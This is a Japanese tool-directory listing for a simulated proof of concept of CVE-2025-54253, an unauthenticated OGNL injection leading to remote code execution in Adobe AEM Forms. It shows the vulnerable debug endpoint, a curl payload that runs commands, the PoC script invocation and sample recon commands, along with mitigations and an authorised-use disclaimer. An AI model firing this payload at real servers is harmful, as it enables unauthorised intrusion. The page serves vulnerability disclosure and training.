Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-54253-Exploit-Demo — CVE-2025-54253 のシミュレーション PoC: Adobe AEM OGNL インジェクション脆弱性 | Kitploit
ツール/GitHubGitHub/shivshantp/cve-2025-54253-exploit-demo
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubshivshantp/cve-2025-54253-exploit-demo

CVE-2025-54253-Exploit-Demo

CVE-2025-54253 のシミュレーション PoC: Adobe AEM OGNL インジェクション脆弱性

リポジトリを見る
1111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE Exploit-Status Python License PoC

🚨 CVE-2025-54253 – Adobe AEM Forms on JEE OGNL インジェクションによるリモートコード実行

🔎 概要

CVE-2025-54253 は、Adobe AEM Forms on JEE における重大なOGNLインジェクションの脆弱性です。この脆弱性により、認証されていない攻撃者が /adminui/debug?debug=OGNL: エンドポイントを介して任意のオペレーティングシステムコマンドを実行できます。

  • 重要度: 緊急
  • CVSSスコア: 9.8 (未確定)
  • 攻撃ベクトル: リモート
  • 認証の必要性: 不要
  • 影響を受ける製品: Adobe AEM Forms on JEE (<= 6.5.23.0)
  • ステータス: 悪用可能性確認済み

🧠 技術詳細

この脆弱性は、適切なサニタイズや認証なしにユーザー制御のOGNL式を評価する、露出したデバッグインターフェースにあります。これを悪用すると、アプリケーションサーバーのコンテキストでリモートコード実行が可能になります。

📝 注記: この脆弱性は、適切なアクセス制御なしに /adminui/debug エンドポイントを公開または内部公開しているインストールに影響します。


🧪 概念実証 (PoC)

🔸 HTTPペイロードベクター

簡単なOGNL式で、ブラウザまたはcurlを使用したコマンド実行を示します。

root@kitploit:~
curl "http://localhost:4502/adminui/debug?debug=OGNL:whoami"

📄 PoCスクリプト

cve-2025-54253-poc.py

root@kitploit:~
python3 poc/cve-2025-54253-poc.py --url http://127.0.0.1:4502 --cmd "whoami"

🧾 エクスプロイトログのサンプル

スクリプトはコマンド実行の出力を exploit.log に記録します。

exploit.log


🛠️ 再現手順

  1. 脆弱なAdobe AEMインスタンス (<= 6.5.23.0) をセットアップします。

  2. Flaskサーバーを起動します(ローカルでシミュレートする場合):
    Flask Running

  3. ブラウザでOGNLを実行します:
    Browser Execution

  4. curlで実行します:
    Curl Execution

  5. コマンドからの出力:
    id
    uname -a
    ls -la

  6. Flaskログ表示:
    Flask Logs

  7. PoCスクリプトの実行:
    Script Execution

  8. 詳細ログ表示:
    Log Output


🧰 使用したツールと技術

  • Python (PoCスクリプト作成)
  • Flask (シミュレートサーバー)
  • Kali Linux
  • curl & ブラウザ
  • GitHub (PoC公開)

✅ 緩和策

  • /adminui/debug へのアクセスを制限する
  • 利用可能なベンダーパッチを適用する
  • アクセスログで不正なOGNL式を監視する
  • WAFやプロキシフィルタリングを使用してそのようなパターンをブロックする

⚠️ 免責事項:
このPoCは教育目的のみです。所有していない、またはテストの明示的な許可がないシステムに対して使用しないでください。


👨‍💻 著者

Shivshant Patil
認定倫理的ハッカー (CEH v13)
B.Tech コンピュータエンジニアリング卒業
🔗 LinkedIn
🔗 GitHub


📚 参考文献

  • 🔗 Adobe Security Advisory (placeholder)
  • 🔗 NVD Entry - CVE-2025-54253
  • 🔗 Exploit Database
ツールをダウンロード